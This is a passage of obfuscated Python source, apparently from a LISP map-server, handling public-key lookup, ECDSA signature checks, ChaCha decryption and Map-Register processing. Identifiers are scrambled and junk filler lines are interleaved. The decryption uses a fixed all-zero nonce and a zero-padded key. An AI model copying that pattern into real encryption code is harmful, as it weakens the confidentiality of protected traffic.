if 67 - 67: OoOoOO00 * o0oOOo0O0Ooo . IiII
if 72 - 72: OoOoOO00 % OoooooooOO * O0
if 27 - 27: I1ii11iIi11i . OoooooooOO / II111iiii . OOooOOo
if 58 - 58: oO0o / ooOoO0o
def lisp_lookup_public_key ( eid ) :
i1oO00O = eid . instance_id
if 31 - 31: o0oOOo0O0Ooo % I11i - OoO0O00
if 40 - 40: o0oOOo0O0Ooo % OoOoOO00 + I11i / O0 - II111iiii
if 9 - 9: OoooooooOO - OOooOOo . I11i * oO0o
if 3 - 3: iIii1I11I1II1 - OoO0O00
if 38 - 38: O0 + ooOoO0o * I1Ii111 - oO0o * o0oOOo0O0Ooo
oO0ooOoO = lisp_get_eid_hash ( eid )
if ( oO0ooOoO == None ) : return ( [ None , None , False ] )
if 25 - 25: o0oOOo0O0Ooo . I1IiiI % iIii1I11I1II1 * Ii1I % I1IiiI * I11i
oO0ooOoO = "hash-" + oO0ooOoO
oOo0oO0o = lisp_address ( LISP_AFI_NAME , oO0ooOoO , len ( oO0ooOoO ) , i1oO00O )
o0o0o = lisp_address ( LISP_AFI_NONE , "" , 0 , i1oO00O )
if 21 - 21: O0 % II111iiii % OoOoOO00 / Ii1I * ooOoO0o
if 82 - 82: I1IiiI % II111iiii * iIii1I11I1II1
if 83 - 83: O0 + i1IIi
if 47 - 47: iIii1I11I1II1 * i11iIiiIii % Ii1I + IiII
i1iI11i = lisp_site_eid_lookup ( oOo0oO0o , o0o0o , True )
if ( i1iI11i == None ) : return ( [ oOo0oO0o , None , False ] )
if 39 - 39: i1IIi / i11iIiiIii % ooOoO0o - ooOoO0o % i1IIi
if 73 - 73: OoO0O00 . iII111i / OOooOOo
if 50 - 50: O0 / IiII % oO0o / I1Ii111 % IiII
if 10 - 10: OoooooooOO
ooOoI1IiiI = None
for OooOOoOO0OO in i1iI11i . registered_rlocs :
I1oOO000 = OooOOoOO0OO . json
if ( I1oOO000 == None ) : continue
try :
I1oOO000 = json . loads ( I1oOO000 . json_string )
except :
lprint ( "Registered RLOC JSON format is invalid for {}" . format ( oO0ooOoO ) )
if 34 - 34: OoooooooOO . I1IiiI . Oo0Ooo % iII111i
return ( [ oOo0oO0o , None , False ] )
if 24 - 24: ooOoO0o * oO0o * Oo0Ooo . oO0o - OoOoOO00
if ( "public-key" not in I1oOO000 ) : continue
ooOoI1IiiI = I1oOO000 [ "public-key" ]
break
if 85 - 85: II111iiii
return ( [ oOo0oO0o , ooOoI1IiiI , True ] )
if 51 - 51: Oo0Ooo
if 57 - 57: i1IIi * ooOoO0o + o0oOOo0O0Ooo + O0 - I1ii11iIi11i % IiII
if 62 - 62: Ii1I / i11iIiiIii - I11i * ooOoO0o + iII111i
if 85 - 85: oO0o . iIii1I11I1II1 % i11iIiiIii - i11iIiiIii % IiII / Oo0Ooo
if 11 - 11: OoO0O00 . I1IiiI * I1ii11iIi11i / ooOoO0o - i11iIiiIii
if 40 - 40: I1ii11iIi11i + I11i * OoooooooOO % OoooooooOO
if 19 - 19: Oo0Ooo . OOooOOo
if 58 - 58: IiII % iII111i + i1IIi % I1IiiI % OOooOOo . iII111i
def lisp_verify_cga_sig ( eid , rloc_record ) :
if 85 - 85: i11iIiiIii . o0oOOo0O0Ooo * iII111i . I1ii11iIi11i / I1Ii111 % Ii1I
if 27 - 27: II111iiii . iIii1I11I1II1 / I1ii11iIi11i / i1IIi / iIii1I11I1II1
if 70 - 70: i11iIiiIii . OoO0O00 / OoooooooOO * OoooooooOO - OOooOOo
if 34 - 34: I1ii11iIi11i * i1IIi % OoooooooOO / I1IiiI
if 39 - 39: OoO0O00 + IiII - II111iiii % I11i
oo0 = json . loads ( rloc_record . json . json_string )
if 80 - 80: o0oOOo0O0Ooo * ooOoO0o
if ( lisp_get_eid_hash ( eid ) ) :
Ii1IiI = eid
elif ( "signature-eid" in oo0 ) :
O0oooOo = oo0 [ "signature-eid" ]
Ii1IiI = lisp_address ( LISP_AFI_IPV6 , O0oooOo , 0 , 0 )
else :
lprint ( " No signature-eid found in RLOC-record" )
return ( False )
if 47 - 47: IiII + O0 / OoooooooOO + iIii1I11I1II1
if 97 - 97: OoooooooOO * I11i . I1Ii111
if 20 - 20: I1IiiI . I1ii11iIi11i
if 55 - 55: OoOoOO00 + I11i - OOooOOo
if 20 - 20: OoO0O00 . OoooooooOO - I1Ii111 * IiII
oOo0oO0o , ooOoI1IiiI , IIoO0 = lisp_lookup_public_key ( Ii1IiI )
if ( oOo0oO0o == None ) :
iIiI1I1ii1I1 = green ( Ii1IiI . print_address ( ) , False )
lprint ( " Could not parse hash in EID {}" . format ( iIiI1I1ii1I1 ) )
return ( False )
if 39 - 39: I1ii11iIi11i . I1Ii111 % iII111i
if 5 - 5: II111iiii . I1IiiI . OoooooooOO * II111iiii * Oo0Ooo
iIi111Ii1 = "found" if IIoO0 else bold ( "not found" , False )
iIiI1I1ii1I1 = green ( oOo0oO0o . print_address ( ) , False )
lprint ( " Lookup for crypto-hashed EID {} {}" . format ( iIiI1I1ii1I1 , iIi111Ii1 ) )
if ( IIoO0 == False ) : return ( False )
if 70 - 70: oO0o / iIii1I11I1II1 + IiII * I1ii11iIi11i
if ( ooOoI1IiiI == None ) :
lprint ( " RLOC-record with public-key not found" )
return ( False )
if 82 - 82: i1IIi * o0oOOo0O0Ooo - Oo0Ooo * I11i - oO0o % I1IiiI
if 77 - 77: I1IiiI % I1ii11iIi11i + OOooOOo . OoooooooOO
o00oIiI1Ii1i11iI = ooOoI1IiiI [ 0 : 8 ] + "..." + ooOoI1IiiI [ - 8 : : ]
lprint ( " RLOC-record with public-key '{}' found" . format ( o00oIiI1Ii1i11iI ) )
if 27 - 27: oO0o + IiII
if 5 - 5: iIii1I11I1II1 + OoOoOO00 * I1Ii111 * i11iIiiIii
if 18 - 18: Oo0Ooo % OOooOOo % oO0o / I11i % O0
if 76 - 76: OoooooooOO % O0 / OoO0O00
if 41 - 41: i11iIiiIii - I1ii11iIi11i - II111iiii
iIiIi1 = oo0 [ "signature" ]
if 85 - 85: I11i / i11iIiiIii
try :
oo0 = binascii . a2b_base64 ( iIiIi1 )
except :
lprint ( " Incorrect padding in signature string" )
return ( False )
if 33 - 33: iIii1I11I1II1 % O0 + II111iiii * OOooOOo . Ii1I * iII111i
if 48 - 48: I11i * iIii1I11I1II1 / oO0o
Ii1I1I = len ( oo0 )
if ( Ii1I1I & 1 ) :
lprint ( " Signature length is odd, length {}" . format ( Ii1I1I ) )
return ( False )
if 73 - 73: OoooooooOO % OoooooooOO * OoO0O00 * II111iiii - O0 - OoO0O00
if 63 - 63: o0oOOo0O0Ooo / IiII - i11iIiiIii
if 99 - 99: O0 + O0 . iIii1I11I1II1 . ooOoO0o * o0oOOo0O0Ooo
if 1 - 1: I1Ii111 - I11i . OoOoOO00
if 72 - 72: II111iiii . O0 . I11i * OoO0O00
o000OOooo000O = Ii1IiI . print_address ( )
if 70 - 70: iII111i % OoooooooOO * I1ii11iIi11i . I11i / OoO0O00
if 6 - 6: O0 . i11iIiiIii
if 85 - 85: i11iIiiIii / Ii1I + Oo0Ooo / OoOoOO00 - I1IiiI
if 39 - 39: OoO0O00
ooOoI1IiiI = binascii . a2b_base64 ( ooOoI1IiiI )
try :
III11II111 = ecdsa . VerifyingKey . from_pem ( ooOoI1IiiI )
except :
ooOiIi11I = bold ( "Bad public-key" , False )
lprint ( " {}, not in PEM format" . format ( ooOiIi11I ) )
return ( False )
if 69 - 69: Ii1I
if 54 - 54: ooOoO0o
if 13 - 13: I11i
if 18 - 18: II111iiii * oO0o % i11iIiiIii / IiII . ooOoO0o
if 2 - 2: OoOoOO00 % I1Ii111
if 35 - 35: OOooOOo
if 50 - 50: iIii1I11I1II1 . I1IiiI + i11iIiiIii
if 65 - 65: I11i % I1IiiI
if 3 - 3: i11iIiiIii % OOooOOo - Ii1I . i1IIi
if 24 - 24: OOooOOo
if 93 - 93: I1ii11iIi11i - iII111i % O0 - Ii1I
try :
OOoO0OOO00 = III11II111 . verify ( oo0 , o000OOooo000O , hashfunc = hashlib . sha256 )
except :
lprint ( " Signature library failed for signature data '{}'" . format ( o000OOooo000O ) )
if 84 - 84: I1ii11iIi11i . iIii1I11I1II1 % IiII * I11i + ooOoO0o
lprint ( " Signature used '{}'" . format ( iIiIi1 ) )
return ( False )
if 59 - 59: oO0o * OoO0O00 - I11i * I1IiiI
return ( OOoO0OOO00 )
if 60 - 60: iII111i - OoooooooOO / iII111i % OoO0O00 . OoOoOO00 - o0oOOo0O0Ooo
if 71 - 71: iII111i * o0oOOo0O0Ooo * i11iIiiIii * O0
if 77 - 77: OOooOOo % iII111i + I11i / OoOoOO00
if 50 - 50: OoOoOO00 - i11iIiiIii - OOooOOo . iIii1I11I1II1
if 97 - 97: oO0o % OOooOOo . OoooooooOO * Ii1I
if 100 - 100: I1ii11iIi11i / Ii1I % Oo0Ooo
if 83 - 83: O0 . I1Ii111 % I1ii11iIi11i
if 97 - 97: Oo0Ooo % OoO0O00 * I1ii11iIi11i * ooOoO0o * OoO0O00
if 12 - 12: ooOoO0o
if 56 - 56: i1IIi
def lisp_remove_eid_from_map_notify_queue ( eid_list ) :
if 3 - 3: OOooOOo - Oo0Ooo * Ii1I + i11iIiiIii
if 53 - 53: i1IIi % I1ii11iIi11i
if 65 - 65: I11i + OoOoOO00 - i11iIiiIii
if 72 - 72: i11iIiiIii - iII111i . i11iIiiIii
if 61 - 61: oO0o . i11iIiiIii / Ii1I % iII111i
IIi1I1 = [ ]
for OOOO0 in eid_list :
for O0OooOo0o in lisp_map_notify_queue :
IIiiIiI = lisp_map_notify_queue [ O0OooOo0o ]
if ( OOOO0 not in IIiiIiI . eid_list ) : continue
if 88 - 88: II111iiii + i11iIiiIii
IIi1I1 . append ( O0OooOo0o )
Ii1111I = IIiiIiI . retransmit_timer
if ( Ii1111I ) : Ii1111I . cancel ( )
if 34 - 34: OOooOOo
lprint ( "Remove from Map-Notify queue nonce 0x{} for EID {}" . format ( IIiiIiI . nonce_key , green ( OOOO0 , False ) ) )
if 67 - 67: OoooooooOO
if 50 - 50: IiII / OoO0O00 / OOooOOo - iIii1I11I1II1
if 18 - 18: i1IIi % I1ii11iIi11i
if 4 - 4: i1IIi - OoOoOO00
if 56 - 56: Oo0Ooo + IiII * Ii1I
if 33 - 33: I1IiiI
if 26 - 26: II111iiii * iIii1I11I1II1 - iIii1I11I1II1 . o0oOOo0O0Ooo . Ii1I
for O0OooOo0o in IIi1I1 : lisp_map_notify_queue . pop ( O0OooOo0o )
return
if 72 - 72: IiII - iIii1I11I1II1
if 25 - 25: IiII
if 51 - 51: O0 / i11iIiiIii % i11iIiiIii % OoOoOO00 + iII111i - Oo0Ooo
if 89 - 89: OoOoOO00 - I1IiiI + IiII
if 5 - 5: I11i - I11i
if 89 - 89: oO0o + OoooooooOO . iII111i + OoO0O00 + i11iIiiIii
if 27 - 27: i11iIiiIii * i11iIiiIii % o0oOOo0O0Ooo * I1IiiI
if 80 - 80: iIii1I11I1II1 / o0oOOo0O0Ooo . I1IiiI
def lisp_decrypt_map_register ( packet ) :
if 55 - 55: IiII * IiII - OOooOOo * II111iiii + OoooooooOO
if 61 - 61: i11iIiiIii
if 24 - 24: O0 + oO0o
if 31 - 31: i1IIi % OOooOOo
if 45 - 45: oO0o % oO0o
i111ii1II11ii = socket . ntohl ( struct . unpack ( "I" , packet [ 0 : 4 ] ) [ 0 ] )
Oo0OO0o = ( i111ii1II11ii >> 13 ) & 0x1
if ( Oo0OO0o == 0 ) : return ( packet )
if 72 - 72: I1ii11iIi11i / II111iiii . oO0o - o0oOOo0O0Ooo
oO0oIi1I111IiI11I = ( i111ii1II11ii >> 14 ) & 0x7
if 63 - 63: I1IiiI . iII111i % iIii1I11I1II1 + I1ii11iIi11i
if 56 - 56: I1Ii111 % oO0o
if 31 - 31: OOooOOo + IiII
if 56 - 56: OoooooooOO * II111iiii
try :
OoooOOoOO = lisp_ms_encryption_keys [ oO0oIi1I111IiI11I ]
OoooOOoOO = OoooOOoOO . zfill ( 32 )
iI1ii = "0" * 8
except :
lprint ( "Cannot decrypt Map-Register with key-id {}" . format ( oO0oIi1I111IiI11I ) )
return ( None )
if 34 - 34: I11i % i1IIi
if 8 - 8: OoOoOO00 / oO0o + oO0o * Ii1I
iiIi = bold ( "Decrypt" , False )
lprint ( "{} Map-Register with key-id {}" . format ( iiIi , oO0oIi1I111IiI11I ) )
if 71 - 71: I1Ii111 - O0 . oO0o % ooOoO0o / I1Ii111
if 28 - 28: o0oOOo0O0Ooo / oO0o
if 65 - 65: O0 / i1IIi
if 78 - 78: OOooOOo . I11i % Oo0Ooo . OoOoOO00
II11 = chacha . ChaCha ( OoooOOoOO , iI1ii , 20 ) . decrypt ( packet [ 4 : : ] )
return ( packet [ 0 : 4 ] + II11 )
if 92 - 92: i11iIiiIii * OoooooooOO
if 36 - 36: iII111i - OoO0O00 + I1IiiI + Ii1I . OoooooooOO
if 75 - 75: oO0o * Oo0Ooo * O0
if 22 - 22: ooOoO0o / OoooooooOO . II111iiii / Ii1I * OoO0O00 . i1IIi
if 62 - 62: oO0o % Ii1I - Ii1I
if 16 - 16: OoO0O00 - O0 - OOooOOo - I11i % OoOoOO00
if 7 - 7: I1Ii111 / OoOoOO00 . II111iiii
def lisp_process_map_register ( lisp_sockets , packet , source , sport ) :
global lisp_registered_count
if 9 - 9: I11i . I11i . OoooooooOO
if 42 - 42: iII111i / oO0o / iII111i * OoO0O00
if 25 - 25: OoOoOO00 - II111iiii + II111iiii . Ii1I * II111iiii
if 12 - 12: IiII / Ii1I
if 54 - 54: Oo0Ooo + Ii1I % OoooooooOO * OOooOOo / OoOoOO00
if 39 - 39: I1IiiI % i11iIiiIii % Ii1I
packet = lisp_decrypt_map_register ( packet )
if ( packet == None ) : return
if 59 - 59: ooOoO0o % OoO0O00 / I1IiiI - II111iiii + OoooooooOO * i11iIiiIii
o0OOOo00o00O00 = lisp_map_register ( )
OOooo , packet = o0OOOo00o00O00 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Register packet" )
return
if 17 - 17: i1IIi / I1Ii111 - iIii1I11I1II1
o0OOOo00o00O00 . sport = sport
if 88 - 88: Oo0Ooo * i1IIi % OOooOOo
o0OOOo00o00O00 . print_map_register ( )
if 65 - 65: iII111i . oO0o
if 67 - 67: I1IiiI / iII111i / O0 % ooOoO0o - IiII / Ii1I
if 31 - 31: I11i - oO0o * ooOoO0o
if 64 - 64: I11i
I1iiIIiIII1i = True
if ( o0OOOo00o00O00 . auth_len == LISP_SHA1_160_AUTH_DATA_LEN ) :
I1iiIIiIII1i = True
if 89 - 89: IiII
if ( o0OOOo00o00O00 . alg_id == LISP_SHA_256_128_ALG_ID ) :
I1iiIIiIII1i = False
if 16 - 16: I1Ii111 / i1IIi * OoOoOO00 - i11iIiiIii . oO0o
if 22 - 22: OOooOOo
if 12 - 12: I11i * I1IiiI + OOooOOo
if 40 - 40: I1ii11iIi11i - OoOoOO00 % OoooooooOO * o0oOOo0O0Ooo % OoooooooOO
if 47 - 47: iIii1I11I1II1 - OOooOOo + I1ii11iIi11i * ooOoO0o + Oo0Ooo + OoO0O00
OOoOOo00 = [ ]
if 60 - 60: ooOoO0o
if 79 - 79: i1IIi % OoO0O00
if 26 - 26: OoOoOO00 * IiII
if 76 - 76: I1IiiI + IiII * I1ii11iIi11i * I1IiiI % Ii1I + ooOoO0o
iI1I1ii = None
OooOo = packet
I1i111i1ii11 = [ ]
oo0OOo00OOoO = o0OOOo00o00O00 . record_count
for OoOOoO0oOo in range ( oo0OOo00OOoO ) :
IiOo0oOoooO = lisp_eid_record ( )
oOiI111IIIiIii = lisp_rloc_record ( )
packet = IiOo0oOoooO . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Register packet" )
return
if 46 - 46: II111iiii - oO0o - Ii1I * OoOoOO00 % i1IIi
IiOo0oOoooO . print_record ( " " , False )
if 71 - 71: o0oOOo0O0Ooo + Oo0Ooo % OoooooooOO
if 5 - 5: i1IIi % Oo0Ooo / OoooooooOO * OoOoOO00 + OOooOOo - ooOoO0o
if 24 - 24: oO0o / ooOoO0o % I1IiiI / I1ii11iIi11i
if 88 - 88: OoO0O00
i1iI11i = lisp_site_eid_lookup ( IiOo0oOoooO . eid , IiOo0oOoooO . group ,
False )
if 96 - 96: IiII % I1ii11iIi11i % Oo0Ooo - i11iIiiIii % iIii1I11I1II1
o00o0ooo0 = i1iI11i . print_eid_tuple ( ) if i1iI11i else None
if 64 - 64: oO0o
if 49 - 49: I1ii11iIi11i . OoOoOO00 / O0 * i1IIi * I1ii11iIi11i . o0oOOo0O0Ooo
if 59 - 59: iII111i - Oo0Ooo . OOooOOo . ooOoO0o % oO0o
if 95 - 95: OoO0O00 + O0 * oO0o
if 39 - 39: i1IIi
if 32 - 32: IiII . ooOoO0o / OoO0O00 / iII111i . iIii1I11I1II1 % IiII
if 28 - 28: I1Ii111 + OoooooooOO + IiII . ooOoO0o . I1IiiI / oO0o
if ( i1iI11i and i1iI11i . accept_more_specifics == False ) :
if ( i1iI11i . eid_record_matches ( IiOo0oOoooO ) == False ) :
O0O0oO00 = i1iI11i . parent_for_more_specifics
if ( O0O0oO00 ) : i1iI11i = O0O0oO00
if 80 - 80: IiII
if 24 - 24: OoO0O00 + ooOoO0o
if 57 - 57: iII111i
if 37 - 37: i1IIi - I1Ii111 + IiII * ooOoO0o
if 43 - 43: O0 . iII111i * I11i / i11iIiiIii
if 39 - 39: oO0o / ooOoO0o
if 66 - 66: iIii1I11I1II1 + I1ii11iIi11i . iIii1I11I1II1 . i1IIi / ooOoO0o - i11iIiiIii
if 23 - 23: OoO0O00 + I1IiiI / I1ii11iIi11i * I1ii11iIi11i % ooOoO0o
OoOoOO0o0oO0 = ( i1iI11i and i1iI11i . accept_more_specifics )
if ( OoOoOO0o0oO0 ) :
i1II11iiIiii = lisp_site_eid ( i1iI11i . site )
i1II11iiIiii . dynamic = True
i1II11iiIiii . eid . copy_address ( IiOo0oOoooO . eid )
i1II11iiIiii . group . copy_address ( IiOo0oOoooO . group )
i1II11iiIiii . parent_for_more_specifics = i1iI11i
i1II11iiIiii . add_cache ( )
i1II11iiIiii . inherit_from_ams_parent ( )
i1iI11i . more_specific_registrations . append ( i1II11iiIiii )
i1iI11i = i1II11iiIiii
else :
i1iI11i = lisp_site_eid_lookup ( IiOo0oOoooO . eid , IiOo0oOoooO . group ,
True )
if 1 - 1: O0 % Ii1I + OOooOOo + oO0o
if 68 - 68: o0oOOo0O0Ooo . OOooOOo % IiII
iIiI1I1ii1I1 = IiOo0oOoooO . print_eid_tuple ( )
if 38 - 38: OOooOOo . II111iiii / i11iIiiIii - OOooOOo % ooOoO0o - I1IiiI
if ( i1iI11i == None ) :
oo0oO0Oo = bold ( "Site not found" , False )
lprint ( " {} for EID {}{}" . format ( oo0oO0Oo , green ( iIiI1I1ii1I1 , False ) ,
", matched non-ams {}" . format ( green ( o00o0ooo0 , False ) if o00o0ooo0 else "" ) ) )
if 92 - 92: OoOoOO00 - oO0o % o0oOOo0O0Ooo % OoooooooOO
if 3 - 3: O0 / ooOoO0o . Ii1I
if 41 - 41: Oo0Ooo / OoOoOO00 % I1Ii111 - O0
if 19 - 19: I1IiiI % I1Ii111 - O0 . iIii1I11I1II1 . I11i % O0
if 88 - 88: ooOoO0o
packet = oOiI111IIIiIii . end_of_rlocs ( packet , IiOo0oOoooO . rloc_count )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
if 52 - 52: iIii1I11I1II1 % ooOoO0o * iIii1I11I1II1
continue
if 20 - 20: i11iIiiIii * I11i
if 29 - 29: IiII / OOooOOo
iI1I1ii = i1iI11i . site
if 39 - 39: O0 + II111iiii
if ( OoOoOO0o0oO0 ) :
I1i = i1iI11i . parent_for_more_specifics . print_eid_tuple ( )
lprint ( " Found ams {} for site '{}' for registering prefix {}" . format ( green ( I1i , False ) , iI1I1ii . site_name , green ( iIiI1I1ii1I1 , False ) ) )
if 94 - 94: OOooOOo % I1ii11iIi11i % O0 + iII111i
else :
I1i = green ( i1iI11i . print_eid_tuple ( ) , False )
lprint ( " Found {} for site '{}' for registering prefix {}" . format ( I1i , iI1I1ii . site_name , green ( iIiI1I1ii1I1 , False ) ) )
if 62 - 62: iIii1I11I1II1 . OoOoOO00 / iIii1I11I1II1 + IiII
if 31 - 31: Ii1I . OoO0O00 . Ii1I + OoO0O00 * iIii1I11I1II1 . iII111i
if 42 - 42: O0 / oO0o % O0 . i1IIi % OOooOOo
if 13 - 13: I1IiiI % ooOoO0o + OOooOOo
if 91 - 91: oO0o - ooOoO0o
if 20 - 20: i1IIi . IiII / o0oOOo0O0Ooo / I11i
if ( iI1I1ii . shutdown ) :
lprint ( ( " Rejecting registration for site '{}', configured in " +
"admin-shutdown state" ) . format ( iI1I1ii . site_name ) )
packet = oOiI111IIIiIii . end_of_rlocs ( packet , IiOo0oOoooO . rloc_count )
continue
if 27 - 27: ooOoO0o . ooOoO0o - Ii1I % i11iIiiIii
if 74 - 74: I1Ii111 - II111iiii % o0oOOo0O0Ooo
if 7 - 7: I1IiiI + OoooooooOO + o0oOOo0O0Ooo . OoooooooOO
if 29 - 29: iII111i * O0 + I1IiiI * IiII + iII111i - IiII
if 38 - 38: I1ii11iIi11i - Ii1I % OoooooooOO
if 43 - 43: iIii1I11I1II1 / OoOoOO00
if 13 - 13: o0oOOo0O0Ooo / I1Ii111
if 67 - 67: OoooooooOO . oO0o * OoOoOO00 - OoooooooOO
oo0OO0oo = o0OOOo00o00O00 . key_id
if ( oo0OO0oo in iI1I1ii . auth_key ) :
i1iiII11i = iI1I1ii . auth_key [ oo0OO0oo ]
else :
i1iiII11i = ""
if 30 - 30: iIii1I11I1II1 * O0 + iIii1I11I1II1 . i1IIi * iIii1I11I1II1 . O0
if 43 - 43: II111iiii / OoOoOO00 + OOooOOo % Oo0Ooo * OOooOOo
O0oOO0OO0OO0 = lisp_verify_auth ( OOooo , o0OOOo00o00O00 . alg_id ,
o0OOOo00o00O00 . auth_data , i1iiII11i )
O0O0oo = "dynamic " if i1iI11i . dynamic else ""
if 2 - 2: II111iiii + OoOoOO00 - I11i
I111 = bold ( "passed" if O0oOO0OO0OO0 else "failed" , False )
oo0OO0oo = "key-id {}" . format ( oo0OO0oo ) if oo0OO0oo == o0OOOo00o00O00 . key_id else "bad key-id {}" . format ( o0OOOo00o00O00 . key_id )
if 71 - 71: o0oOOo0O0Ooo - I1Ii111
lprint ( " Authentication {} for {}EID-prefix {}, {}" . format ( I111 , O0O0oo , green ( iIiI1I1ii1I1 , False ) , oo0OO0oo ) )
if 45 - 45: II111iiii - OOooOOo / oO0o % O0 . iII111i . iII111i
if 82 - 82: iIii1I11I1II1 % Oo0Ooo * i1IIi - I1Ii111 - I1ii11iIi11i / iII111i
if 24 - 24: IiII
if 95 - 95: IiII + OoOoOO00 * OOooOOo
if 92 - 92: OoOoOO00 + ooOoO0o . iII111i
if 59 - 59: iIii1I11I1II1 % I1Ii111 + I1ii11iIi11i . OoOoOO00 * Oo0Ooo / I1Ii111
ii11i = True
O000O0OOOo0O0 = ( lisp_get_eid_hash ( IiOo0oOoooO . eid ) != None )
if ( O000O0OOOo0O0 or i1iI11i . require_signature ) :
o0OOoo000Oooo = "Required " if i1iI11i . require_signature else ""
iIiI1I1ii1I1 = green ( iIiI1I1ii1I1 , False )
OooOOoOO0OO = lisp_find_sig_in_rloc_set ( packet , IiOo0oOoooO . rloc_count )
if ( OooOOoOO0OO == None ) :
ii11i = False
lprint ( ( " {}EID-crypto-hash signature verification {} " + "for EID-prefix {}, no signature found" ) . format ( o0OOoo000Oooo ,
# Oo0Ooo / II111iiii * Oo0Ooo - ooOoO0o
bold ( "failed" , False ) , iIiI1I1ii1I1 ) )
else :
ii11i = lisp_verify_cga_sig ( IiOo0oOoooO . eid , OooOOoOO0OO )
I111 = bold ( "passed" if ii11i else "failed" , False )
lprint ( ( " {}EID-crypto-hash signature verification {} " + "for EID-prefix {}" ) . format ( o0OOoo000Oooo , I111 , iIiI1I1ii1I1 ) )
if 46 - 46: o0oOOo0O0Ooo
if 41 - 41: I11i % II111iiii - II111iiii + OoO0O00
if 98 - 98: iIii1I11I1II1 + OOooOOo * oO0o / o0oOOo0O0Ooo . iII111i
if 52 - 52: IiII + iIii1I11I1II1
if ( O0oOO0OO0OO0 == False or ii11i == False ) :
packet = oOiI111IIIiIii . end_of_rlocs ( packet , IiOo0oOoooO . rloc_count )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
if 22 - 22: IiII - OOooOOo + I1ii11iIi11i
continue
if 64 - 64: OoOoOO00
if 79 - 79: IiII
if 65 - 65: Oo0Ooo - i11iIiiIii * OoOoOO00 . I1Ii111 . iIii1I11I1II1
if 48 - 48: iIii1I11I1II1 - oO0o / OoO0O00 + O0 . Ii1I + I1Ii111
if 17 - 17: OoOoOO00 . Oo0Ooo - I1Ii111 / I1Ii111 + I11i % i1IIi
if 31 - 31: OoooooooOO . O0 / OoO0O00 . I1Ii111
if ( o0OOOo00o00O00 . merge_register_requested ) :
O0O0oO00 = i1iI11i
O0O0oO00 . inconsistent_registration = False
if 41 - 41: OoooooooOO + iII111i . OOooOOo
if 73 - 73: oO0o + i1IIi + i11iIiiIii / I1ii11iIi11i
if 100 - 100: I1IiiI % ooOoO0o % OoooooooOO / i11iIiiIii + i11iIiiIii % IiII
if 39 - 39: Ii1I % o0oOOo0O0Ooo + OOooOOo / iIii1I11I1II1
if 40 - 40: iIii1I11I1II1 / iII111i % OOooOOo % i11iIiiIii
if ( i1iI11i . group . is_null ( ) ) :
if ( O0O0oO00 . site_id != o0OOOo00o00O00 . site_id ) :
O0O0oO00 . site_id = o0OOOo00o00O00 . site_id
O0O0oO00 . registered = False
O0O0oO00 . individual_registrations = { }
O0O0oO00 . registered_rlocs = [ ]
lisp_registered_count -= 1
if 57 - 57: II111iiii % OoO0O00 * i1IIi
if 19 - 19: ooOoO0o . iIii1I11I1II1 + I1ii11iIi11i + I1ii11iIi11i / o0oOOo0O0Ooo . Oo0Ooo
if 9 - 9: II111iiii % OoooooooOO
III11II111 = o0OOOo00o00O00 . xtr_id
if ( III11II111 in i1iI11i . individual_registrations ) :
i1iI11i = i1iI11i . individual_registrations [ III11II111 ]
else :
i1iI11i = lisp_site_eid ( iI1I1ii )
i1iI11i . eid . copy_address ( O0O0oO00 . eid )
i1iI11i . group . copy_address ( O0O0oO00 . group )
i1iI11i . encrypt_json = O0O0oO00 . encrypt_json
O0O0oO00 . individual_registrations [ III11II111 ] = i1iI11i
if 4 - 4: i1IIi * i11iIiiIii % OoooooooOO + OoOoOO00 . oO0o
else :
i1iI11i . inconsistent_registration = i1iI11i . merge_register_requested
if 95 - 95: I1ii11iIi11i * OoOoOO00 % o0oOOo0O0Ooo / O0 + ooOoO0o % OOooOOo
if 48 - 48: i1IIi + IiII - iIii1I11I1II1 . i11iIiiIii % OOooOOo + I1ii11iIi11i
if 95 - 95: ooOoO0o + OoOoOO00 . II111iiii + Ii1I
i1iI11i . map_registers_received += 1
if 81 - 81: OoooooooOO / OOooOOo / Oo0Ooo
if 26 - 26: iII111i
if 93 - 93: Oo0Ooo + I1IiiI % OoOoOO00 / OOooOOo / I1ii11iIi11i
if 6 - 6: IiII
if 68 - 68: Oo0Ooo
ooOiIi11I = ( i1iI11i . is_rloc_in_rloc_set ( source ) == False )
if ( IiOo0oOoooO . record_ttl == 0 and ooOiIi11I ) :
lprint ( " Ignore deregistration request from {}" . format ( red ( source . print_address_no_iid ( ) , False ) ) )
if 83 - 83: OOooOOo / iIii1I11I1II1 . OoO0O00 - oO0o % Oo0Ooo
continue
if 30 - 30: Ii1I . OoOoOO00 / oO0o . OoO0O00
if 93 - 93: i11iIiiIii
if 33 - 33: i1IIi % OoooooooOO + Oo0Ooo % I1IiiI / ooOoO0o
if 40 - 40: IiII % IiII
if 9 - 9: I1IiiI * i1IIi + OOooOOo * OoOoOO00
if 8 - 8: iII111i
o00o0o = i1iI11i . registered_rlocs
i1iI11i . registered_rlocs = [ ]
if 60 - 60: iIii1I11I1II1 % iIii1I11I1II1 * o0oOOo0O0Ooo + OoO0O00 . OoOoOO00 % I1Ii111
if 9 - 9: OoooooooOO % IiII % I1Ii111
if 85 - 85: IiII - OoO0O00 / I1ii11iIi11i + OOooOOo / i1IIi . iII111i
if 20 - 20: oO0o + oO0o + Oo0Ooo / o0oOOo0O0Ooo
IiIIiiii = packet
for I1I1II1iI in range ( IiOo0oOoooO . rloc_count ) :
oOiI111IIIiIii = lisp_rloc_record ( )
packet = oOiI111IIIiIii . decode ( packet , None , i1iI11i . encrypt_json )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
if 100 - 100: i1IIi
oOiI111IIIiIii . print_record ( " " )
if 41 - 41: IiII / I1ii11iIi11i - i1IIi / II111iiii % OOooOOo
if 22 - 22: OoooooooOO + i1IIi % OoooooooOO
if 15 - 15: o0oOOo0O0Ooo % I1ii11iIi11i / II111iiii
if 50 - 50: oO0o * Ii1I % I1Ii111
if ( len ( iI1I1ii . allowed_rlocs ) > 0 ) :
Oo0o = oOiI111IIIiIii . rloc . print_address ( )
if ( Oo0o not in iI1I1ii . allowed_rlocs ) :
lprint ( ( " Reject registration, RLOC {} not " + "configured in allowed RLOC-set" ) . format ( red ( Oo0o , False ) ) )
if 74 - 74: iIii1I11I1II1 - OOooOOo / I1Ii111 / ooOoO0o . oO0o % iIii1I11I1II1
if 91 - 91: o0oOOo0O0Ooo . o0oOOo0O0Ooo - Ii1I
i1iI11i . registered = False
